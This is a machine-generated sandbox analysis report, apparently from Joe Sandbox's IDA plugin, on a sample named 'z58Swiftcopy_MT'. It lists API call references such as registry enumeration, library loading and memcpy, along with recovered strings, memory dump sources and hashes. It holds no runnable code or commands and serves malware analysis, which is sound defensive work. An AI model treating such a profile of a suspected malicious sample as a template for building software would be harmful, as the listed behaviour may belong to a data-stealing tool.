                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4218492932-0
                                                                                                                                                                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfwcscat
                                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                      • API String ID: 384018552-4153097237
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                                      • String ID: 6$\
                                                                                                                                                                                                                                      • API String ID: 404372293-1284684873
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1331804452-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                                      • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                                      • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                                      • API String ID: 2521778956-791839006
                                                                                                                                                                                                                                      • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                                      • API String ID: 999028693-502967061
                                                                                                                                                                                                                                      • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2350177629-0
                                                                                                                                                                                                                                      • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                      • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                                      • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409042
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 265355444-0
                                                                                                                                                                                                                                      • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4131475296-0
                                                                                                                                                                                                                                      • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                                                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
